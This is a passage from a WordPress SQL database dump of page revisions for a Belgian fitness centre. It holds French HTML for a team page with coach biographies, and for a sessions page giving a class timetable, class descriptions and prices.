<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-27', '', '', '2013-07-03 19:48:41', '2013-07-03 19:48:41', '', 20, 'http://www.crosstrainingcenter.be/?p=249', 0, 'revision', '', 0),
(250, 1, '2013-07-03 19:51:00', '2013-07-03 19:51:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports<br>\r\nFormateur coach<br>\r\nCoach</h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\n\r\nFormateur coach\r\n\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-28', '', '', '2013-07-03 19:51:00', '2013-07-03 19:51:00', '', 20, 'http://www.crosstrainingcenter.be/?p=250', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(256, 1, '2013-07-03 19:13:39', '2013-07-03 19:13:39', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 19:13:39', '2013-07-03 19:13:39', '', 11, 'http://www.crosstrainingcenter.be/?p=256', 0, 'revision', '', 0),
(251, 1, '2013-07-03 19:52:22', '2013-07-03 19:52:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting</h5>\r\nFormateur coach\r\n\r\nCoach\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-29', '', '', '2013-07-03 19:52:22', '2013-07-03 19:52:22', '', 20, 'http://www.crosstrainingcenter.be/?p=251', 0, 'revision', '', 0),
(252, 1, '2013-07-03 19:54:26', '2013-07-03 19:54:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-30', '', '', '2013-07-03 19:54:26', '2013-07-03 19:54:26', '', 20, 'http://www.crosstrainingcenter.be/?p=252', 0, 'revision', '', 0),
(253, 1, '2013-07-03 19:55:18', '2013-07-03 19:55:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" 